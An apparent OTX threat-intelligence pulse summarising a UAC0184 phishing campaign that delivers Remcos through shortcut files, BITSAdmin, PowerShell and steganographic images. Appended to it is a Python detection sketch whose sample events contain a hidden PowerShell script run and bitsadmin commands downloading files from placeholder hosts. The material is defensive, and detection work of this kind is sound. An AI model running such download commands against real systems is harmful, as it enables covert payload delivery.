UAC0184 Steganography Based Remcos Campaign

UAC0184 runs a multi-stage phishing campaign that uses fake documents and shortcut files to trick users into running them. The attack abuses legitimate Windows tools such as BITSAdmin and PowerShell to download and run malicious content. It hides the malware inside image files using steganography, and a loader then extracts it.

Pulse ID: 6a10b4b34a90f600cf8a1fc7
Pulse Link: https://otx.alienvault.com/pulse/6a10b4b34a90f600cf8a1fc7
Pulse Author: cryptocti
Created: 2026-05-22 19:55:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #PowerShell #Remcos #Steganography #Windows #bot #cryptocti
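A detection sketch for the BITSAdmin/PowerShell download stage described above, added here as an example and not taken from the pulse or its author. The event fields, sample command lines and `example.invalid` hosts are constructed, and treating `Start-BitsTransfer` and an `explorer.exe` parent (what a double-clicked shortcut produces) as signals is an assumption of this example.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events (Sysmon Event ID 1 style); not taken from the pulse.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -WindowStyle Hidden -File C:\Users\Public\stage.ps1"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job1 http://files.example.invalid/picture.png C:\Users\Public\picture.png"},
    {"pid": 500, "ppid": 4, "image": r"C:\Windows\System32\services.exe", "cmd": "services.exe"},
    {"pid": 510, "ppid": 500, "image": r"C:\Windows\System32\cmd.exe", "cmd": r"cmd /c C:\Tools\update.cmd"},
    {"pid": 520, "ppid": 510, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer upd http://repo.example.invalid/pkg.cab C:\Temp\pkg.cab"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe", "cmd": "bitsadmin /list"},
]
URL = re.compile(r"https?://", re.I)
BITS_JOB = re.compile(r"/(transfer|addfile)\b", re.I)  # bitsadmin switches that fetch a file
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe"}

def name(ev):
    return basename(ev["image"]).lower()

def ancestors(ev, by_pid):
    """Yield parent, grandparent, ... of an event; stops at unknown PIDs or loops."""
    seen = set()
    while ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev

def detect(events):
    """Return (pid, severity) per BITS download from a URL; 'high' if user-launched."""
    by_pid = {e["pid"]: e for e in events}  # assumes PIDs are unique in the sample window
    alerts = []
    for ev in events:
        cmd = ev["cmd"]
        via_cli = name(ev) == "bitsadmin.exe" and BITS_JOB.search(cmd)
        via_ps = name(ev) == "powershell.exe" and "start-bitstransfer" in cmd.lower()
        if not ((via_cli or via_ps) and URL.search(cmd)):
            continue
        chain = [name(ev)] + [name(a) for a in ancestors(ev, by_pid)]
        # Heuristic: a script host whose direct parent is explorer.exe sits in the chain.
        user_launched = any(c in SCRIPT_HOSTS and p == "explorer.exe" for c, p in zip(chain, chain[1:]))
        alerts.append((ev["pid"], "high" if user_launched else "medium"))
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

The service-launched download is kept at medium rather than dropped, since legitimate update scripts also use BITS and need an allow-list rather than silence.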
